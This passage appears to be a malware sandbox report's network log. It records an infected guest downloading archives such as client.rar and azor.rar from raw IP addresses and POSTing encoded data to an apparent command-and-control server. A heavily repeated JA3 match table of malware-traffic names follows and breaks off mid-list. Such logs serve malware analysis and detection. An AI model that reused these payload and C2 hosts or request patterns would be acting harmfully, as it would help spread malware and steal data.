User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: ksoniay95ee.info
DNT: 1
Connection: Keep-Alive
Cookie: lang=en

http://ksoniay95ee.info/images/k1bBds2o/QmLUr43VFSfi6mVN0k_2Fri/aRq5qJ_2Bb/9pn_2FrlWUAEwA3DA/8_2BlKV4KDN_/2B_2BLZHLEa/vLvK_2F5G0A625/hGoDuTo8Bf7h2KRBD9vOP/gcTRbqx7bC5Q89C6/6YYly9yOp3zpx2r/BwphZTlcwHbBf1/hYP.avi
GET /images/k1bBds2o/QmLUr43VFSfi6mVN0k_2Fri/aRq5qJ_2Bb/9pn_2FrlWUAEwA3DA/8_2BlKV4KDN_/2B_2BLZHLEa/vLvK_2F5G0A625/hGoDuTo8Bf7h2KRBD9vOP/gcTRbqx7bC5Q89C6/6YYly9yOp3zpx2r/BwphZTlcwHbBf1/hYP.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: ksoniay95ee.info
DNT: 1
Connection: Keep-Alive
Cookie: lang=en

http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86400
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

http://151.106.27.208/client.rar
GET /client.rar HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: 151.106.27.208
Connection: Keep-Alive
Cache-Control: no-cache

http://89.163.144.224/klansfuuerifneiferunfasd/modules/client.rar
GET /klansfuuerifneiferunfasd/modules/client.rar HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: 89.163.144.224
Connection: Keep-Alive
Cache-Control: no-cache

http://162.213.250.131/azor.rar
GET /azor.rar HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: 162.213.250.131
Connection: Keep-Alive
Cache-Control: no-cache

http://85.114.134.49/index.php
POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 85.114.134.49
Content-Length: 107
Cache-Control: no-cache

\x00\x00\x00Ep\x9d1p\x9d:p\x9d7\x11\x8b0g\xefFp\x9cGp\x9d0p\x9d7p\x9d0\x14\x8b0g\xeb@p\x9d5p\x9cGp\x9d0\x11\x8b0e\x8b0e\x8b0l\x8b0b\x8b0m\xeb&g\xeaAp\x9d:p\x9d7p\x9d2p\x9d5\x14\x8b0d\x8b0l\x8b1\x11\x8b0e\x8b0e\xeb&f\x9a&f\x9e@p\x9d0\x16
http://85.114.134.49/index.php
POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 85.114.134.49
Content-Length: 6962
Cache-Control: no-cache

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

Source Source Port Destination Destination Port JA3 Hash JA3 Description
10.0.90.175 49363 109.230.199.24 qqtube.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49364 109.230.199.24 qqtube.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49366 109.230.199.24 qqtube.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, 
nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49367 109.230.199.24 qqtube.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, 
nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49368 109.230.199.24 qqtube.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, 
nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49391 109.230.199.24 qqtube.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, 
nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49392 109.230.199.24 qqtube.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, 
nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49393 109.230.199.24 qqtube.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, 
nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49371 176.10.125.110 parolinos.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, 
nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49372 176.10.125.110 parolinos.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, 